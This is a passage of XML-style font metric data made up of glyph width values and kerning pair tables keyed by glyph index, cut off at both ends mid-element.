w="673"/><wx w="756"/><wx w="588"/><wx w="520"/><wx w="471"/><wx w="471"/><wx w="764"/><wx w="981"/><wx w="611"/><wx w="530"/><wx w="400"/><wx w="837"/><wx w="637"/><wx w="636"/><wx w="837"/><wx w="668"/><wx w="611"/><wx w="611"/><wx w="1000"/><wx 
w="636"/><wx w="684"/><wx w="684"/><wx w="787"/><wx w="1069"/><wx w="1022"/><wx w="500"/><wx w="1000"/><wx w="518"/><wx w="518"/><wx w="317"/><wx w="317"/><wx w="837"/><wx w="494"/><wx w="591"/><wx w="610"/><wx w="166"/><wx w="636"/><wx w="399"/><wx w="399"/><wx w="629"/><wx w="629"/><wx w="500"/><wx w="317"/><wx w="317"/><wx w="518"/><wx w="1341"/><wx w="684"/><wx w="631"/><wx w="684"/><wx w="631"/><wx w="631"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="787"/><wx w="787"/><wx w="787"/><wx w="731"/><wx w="731"/><wx w="731"/><wx w="277"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="562"/><wx w="284"/><wx w="634"/><wx w="520"/><wx w="685"/><wx w="524"/><wx w="336"/><wx w="774"/><wx w="611"/><wx w="610"/><wx w="591"/><wx w="604"/><wx w="634"/><wx w="837"/><wx w="837"/><wx w="400"/><wx w="400"/><wx w="400"/><wx w="969"/><wx w="969"/><wx w="969"/><wx w="774"/><wx w="634"/><wx w="294"/><wx w="634"/><wx w="520"/><wx w="698"/><wx w="549"/><wx w="698"/><wx w="549"/><wx w="634"/><wx w="360"/><wx w="317"/><wx w="636"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="400"/><wx w="500"/><wx w="500"/></cid-widths></multibyte-extras><kerning kpx1="246"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="235"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="43"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-35" kpx2="197"/><pair kern="-30" kpx2="181"/></kerning><kerning kpx1="16"><pair kern="36" kpx2="246"/><pair kern="-17" kpx2="235"/><pair 
kern="-21" kpx2="199"/><pair kern="18" kpx2="123"/><pair kern="27" kpx2="208"/><pair kern="-118" kpx2="187"/><pair kern="-49" kpx2="59"/><pair kern="18" kpx2="124"/><pair kern="-21" kpx2="201"/><pair kern="-118" kpx2="60"/><pair kern="36" kpx2="52"/><pair kern="18" kpx2="125"/><pair kern="36" kpx2="42"/><pair kern="-118" kpx2="234"/><pair kern="18" kpx2="122"/><pair kern="27" kpx2="210"/><pair kern="-21" kpx2="36"/><pair kern="18" kpx2="82"/><pair kern="-40" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="27" kpx2="175"/><pair kern="27" kpx2="50"/><pair kern="27" kpx2="209"/><pair kern="27" kpx2="103"/><pair kern="-21" kpx2="98"/><pair kern="55" kpx2="45"/><pair kern="-21" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-26" kpx2="89"/><pair kern="18" kpx2="121"/><pair kern="-58" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-21" kpx2="174"/></kerning><kerning kpx1="112"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="123"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="251"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="213"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="208"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" 
kpx2="234"/></kerning><kerning kpx1="187"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="113"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="144"><pair kern="-40" kpx2="180"/><pair kern="-54" kpx2="197"/><pair kern="-44" kpx2="181"/></kerning><kerning kpx1="59"><pair kern="-72" kpx2="100"/><pair kern="-63" kpx2="210"/><pair kern="-17" kpx2="55"/><pair kern="-44" kpx2="114"/><pair kern="-44" kpx2="72"/><pair kern="-63" kpx2="175"/><pair kern="-49" kpx2="16"/><pair kern="-63" kpx2="50"/><pair kern="-63" kpx2="209"/><pair kern="-44" kpx2="112"/><pair kern="-72" kpx2="251"/><pair kern="-63" 
kpx2="103"/><pair kern="-63" kpx2="208"/><pair kern="-44" kpx2="113"/><pair kern="-40" kpx2="181"/><pair kern="-77" kpx2="180"/><pair kern="-54" kpx2="169"/><pair kern="-21" kpx2="197"/><pair kern="-72" kpx2="38"/><pair kern="-72" kpx2="253"/><pair kern="-44" kpx2="115"/></kerning><kerning kpx1="73"><pair kern="31" kpx2="180"/><pair kern="-17" kpx2="90"/><pair kern="-72" kpx2="17"/><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="169"/><pair kern="-114" kpx2="197"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="87"/><pair kern="-54" kpx2="16"/><pair kern="-35" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="41"><pair kern="-17" kpx2="227"/><pair kern="-54" kpx2="126"/><pair kern="-91" kpx2="107"/><pair kern="-91" kpx2="235"/><pair kern="-54" kpx2="72"/><pair kern="-91" kpx2="199"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="112"/><pair kern="-54" kpx2="113"/><pair kern="-17" kpx2="54"/><pair kern="-21" kpx2="180"/><pair kern="-91" kpx2="105"/><pair kern="-54" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-91" kpx2="201"/><pair kern="-72" kpx2="85"/><pair kern="-91" kpx2="106"/><pair kern="-77" kpx2="29"/><pair kern="-35" kpx2="125"/><pair kern="-54" kpx2="115"/><pair kern="-54" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-91" kpx2="68"/><pair kern="-91" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-91" kpx2="186"/><pair kern="-17" kpx2="55"/><pair kern="-54" kpx2="114"/><pair kern="-54" kpx2="127"/><pair kern="-91" kpx2="108"/><pair kern="-91" kpx2="98"/><pair kern="-72" kpx2="76"/><pair kern="-160" kpx2="17"/><pair kern="-54" kpx2="128"/><pair kern="-91" kpx2="173"/><pair kern="-91" kpx2="109"/><pair kern="-183" kpx2="197"/><pair kern="-91" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-91" kpx2="110"/><pair kern="-91" kpx2="174"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="124"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" 
kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="169"><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-17" kpx2="58"/><pair kern="-17" kpx2="186"/><pair kern="-54" kpx2="55"/><pair kern="-17" kpx2="251"/><pair kern="-72" kpx2="187"/><pair kern="-17" kpx2="39"/><pair kern="73" kpx2="144"/><pair kern="-17" kpx2="45"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-72" kpx2="60"/><pair kern="-17" kpx2="89"/><pair kern="-17" kpx2="253"/><pair kern="-54" kpx2="57"/><pair kern="-17" kpx2="37"/><pair kern="-17" kpx2="42"/><pair kern="-72" kpx2="234"/></kerning><kerning kpx1="201"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" 
kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="60"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="85"><pair kern="-21" kpx2="254"/><pair kern="-21" kpx2="72"/><pair kern="-63" kpx2="16"/><pair kern="-21" kpx2="112"/><pair kern="-21" kpx2="123"/><pair kern="-17" kpx2="80"/><pair 
kern="-21" kpx2="113"/><pair kern="-17" kpx2="71"/><pair kern="-21" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-21" kpx2="252"/><pair kern="-21" kpx2="70"/><pair kern="-17" kpx2="85"/><pair kern="-17" kpx2="29"/><pair kern="-21" kpx2="125"/><pair kern="-21" kpx2="115"/><pair kern="-21" kpx2="111"/><pair kern="-21" kpx2="122"/><pair kern="-21" kpx2="82"/><pair kern="-17" kpx2="75"/><pair kern="-21" kpx2="114"/><pair kern="-26" kpx2="91"/><pair kern="-17" kpx2="81"/><pair kern="41" kpx2="181"/><pair kern="-91" kpx2="17"/><pair kern="-151" kpx2="197"/><pair kern="-17" kpx2="74"/><pair kern="-17" kpx2="84"/><pair kern="-21" kpx2="121"/><pair kern="-17" kpx2="247"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="61"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="234"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" 
kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="100"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="122"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="47"><pair kern="-17" kpx2="126"/><pair kern="-91" kpx2="235"/><pair kern="-49" kpx2="104"/><pair kern="-17" kpx2="72"/><pair kern="22" kpx2="199"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-49" kpx2="213"/><pair kern="-35" kpx2="208"/><pair kern="-132" kpx2="187"/><pair kern="-17" kpx2="113"/><pair kern="-202" kpx2="180"/><pair kern="-17" kpx2="129"/><pair kern="-17" kpx2="124"/><pair kern="22" kpx2="201"/><pair kern="-132" kpx2="60"/><pair kern="-49" kpx2="211"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="115"/><pair kern="-132" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-17" kpx2="122"/><pair kern="-35" kpx2="210"/><pair kern="22" kpx2="36"/><pair kern="-17" kpx2="82"/><pair kern="-91" kpx2="58"/><pair kern="-91" kpx2="186"/><pair kern="-137" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-35" kpx2="175"/><pair kern="-17" kpx2="127"/><pair kern="-35" kpx2="50"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="22" kpx2="98"/><pair kern="-262" kpx2="181"/><pair kern="-17" kpx2="128"/><pair kern="22" kpx2="173"/><pair kern="-49" kpx2="212"/><pair kern="-91" kpx2="92"/><pair kern="-17" kpx2="121"/><pair kern="-109" kpx2="57"/><pair kern="22" 
kpx2="174"/><pair kern="-49" kpx2="56"/></kerning><kerning kpx1="210"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="58"><pair kern="-35" kpx2="126"/><pair kern="-63" kpx2="107"/><pair kern="-17" kpx2="235"/><pair kern="-58" kpx2="72"/><pair kern="-54" kpx2="199"/><pair kern="-40" kpx2="16"/><pair kern="-58" kpx2="112"/><pair kern="-58" kpx2="123"/><pair kern="-58" kpx2="113"/><pair kern="-17" kpx2="180"/><pair kern="-63" kpx2="105"/><pair kern="-35" kpx2="129"/><pair kern="-58" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-54" kpx2="201"/><pair kern="-44" kpx2="85"/><pair kern="-63" kpx2="106"/><pair kern="-58" kpx2="29"/><pair kern="-58" kpx2="125"/><pair kern="-17" kpx2="170"/><pair kern="-58" kpx2="115"/><pair kern="-35" kpx2="88"/><pair kern="-58" kpx2="122"/><pair kern="-63" kpx2="68"/><pair kern="-54" kpx2="36"/><pair kern="-58" kpx2="82"/><pair kern="-17" kpx2="186"/><pair kern="-58" kpx2="114"/><pair kern="-35" kpx2="127"/><pair kern="-63" kpx2="108"/><pair kern="-54" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-114" kpx2="17"/><pair kern="-35" kpx2="128"/><pair kern="-54" kpx2="173"/><pair kern="-63" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-17" kpx2="92"/><pair kern="-58" kpx2="121"/><pair kern="-63" kpx2="110"/><pair kern="-54" kpx2="174"/></kerning><kerning kpx1="82"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" 
kpx2="181"/></kerning><kerning kpx1="186"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="175"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="209"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="103"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="81"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="98"><pair 
kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="212"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="229"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="38"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair 
kern="-17" kpx2="234"/></kerning><kerning kpx1="121"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="57"><pair kern="-67" kpx2="126"/><pair kern="-77" kpx2="107"/><pair kern="-26" kpx2="235"/><pair kern="-77" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-58" kpx2="16"/><pair kern="-77" kpx2="123"/><pair kern="-77" kpx2="112"/><pair kern="-17" kpx2="208"/><pair kern="-77" kpx2="113"/><pair kern="-77" kpx2="105"/><pair kern="-67" kpx2="129"/><pair kern="-77" kpx2="124"/><pair kern="-86" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-77" kpx2="106"/><pair kern="-81" kpx2="29"/><pair kern="-77" kpx2="125"/><pair kern="-54" kpx2="170"/><pair kern="-77" kpx2="115"/><pair kern="-67" kpx2="88"/><pair kern="-77" kpx2="122"/><pair kern="-77" kpx2="68"/><pair kern="-17" kpx2="210"/><pair kern="-63" kpx2="36"/><pair kern="-77" kpx2="82"/><pair kern="-26" kpx2="186"/><pair kern="-77" kpx2="114"/><pair kern="-17" kpx2="175"/><pair kern="-67" kpx2="127"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-77" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-128" kpx2="17"/><pair kern="-67" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-77" kpx2="109"/><pair kern="-137" kpx2="197"/><pair kern="-26" kpx2="92"/><pair kern="-77" kpx2="121"/><pair kern="-77" kpx2="110"/><pair kern="-63" kpx2="174"/></kerning><kerning kpx1="37"><pair kern="-17" kpx2="227"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="251"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-17" kpx2="54"/><pair kern="-54" kpx2="180"/><pair kern="-30" kpx2="169"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" 
kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-54" kpx2="181"/><pair kern="-40" kpx2="197"/><pair kern="-17" kpx2="38"/><pair kern="-30" kpx2="57"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="120"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="249"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="227"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="51"><pair kern="-17" kpx2="126"/><pair kern="-44" kpx2="107"/><pair kern="-35" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-21" kpx2="16"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="112"/><pair kern="-21" kpx2="187"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="86"/><pair kern="18" kpx2="180"/><pair kern="-44" kpx2="105"/><pair kern="-17" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-17" kpx2="85"/><pair kern="-21" kpx2="60"/><pair kern="-44" kpx2="106"/><pair kern="-35" 